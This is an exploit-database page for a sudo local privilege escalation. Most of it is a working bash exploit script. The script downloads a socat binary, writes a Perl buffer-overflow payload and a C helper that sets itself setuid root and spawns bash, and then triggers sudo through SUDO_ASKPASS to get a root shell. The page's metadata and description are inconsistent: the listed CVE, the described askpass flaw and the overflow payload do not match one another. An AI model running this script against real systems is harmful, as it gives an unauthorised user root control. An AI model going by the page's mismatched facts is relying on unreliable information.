header-logo
Suggest Exploit
vendor:
Sudo
by:
Andrew D
8.8
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name: Sudo
Affected Version From: All versions prior to 1.8.28
Affected Version To: 1.8.28
Patch Exists: YES
Related CWE: CVE-2019-14287
CPE: a:sudo:sudo
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/suse-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-14287/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2019-14287/
Other Scripts: N/A
Platforms Tested: Linux
2019

Privilege Escalation via Sudo Askpass Vulnerability

This exploit is a privilege escalation vulnerability in sudo. It allows a user to gain root privileges by exploiting a vulnerability in the sudo askpass feature. The vulnerability is triggered when a user runs the sudo command with the -S flag and the SUDO_ASKPASS environment variable set to a malicious program. The malicious program then executes a setuid shell which gives the user root privileges. The vulnerability was discovered in 2019 and affects all versions of sudo prior to 1.8.28.

Mitigation:

Upgrade to the latest version of sudo (1.8.28 or later).
Source

Exploit-DB raw data:

#!/bin/bash
# We will need socat to run this.
if [ ! -f socat ];
then
    wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
    chmod +x socat
fi

cat <<EOF > xpl.pl
\$buf_sz = 256;
\$askpass_sz = 32;
\$signo_sz = 4*65;
\$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24);
print("\x00\x15"x(\$buf_sz+\$askpass_sz) .
     ("\x00\x15"x\$signo_sz) .
     (\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00".
     "\x00\x00\x00\x00\x00\x15"x104 . "\n");
EOF

cat <<EOF > exec.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
        printf("Exploiting!\n");
        int fd = open("/proc/self/exe", O_RDONLY);
        struct stat st;
        fstat(fd, &st);
        if (st.st_uid != 0)
        {
                fchown(fd, 0, st.st_gid);
                fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
        }
        else
        {
                setuid(0);
                execve("/bin/bash",NULL,NULL);
        }
return 0;
}
EOF
cc -w exec.c -o /tmp/pipe
./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"&
sleep 0.5
export SUDO_ASKPASS=/tmp/pipe
sudo -k -S id < /tmp/pty
/tmp/pipe

Navigation

Suggest Exploit

Services By CQR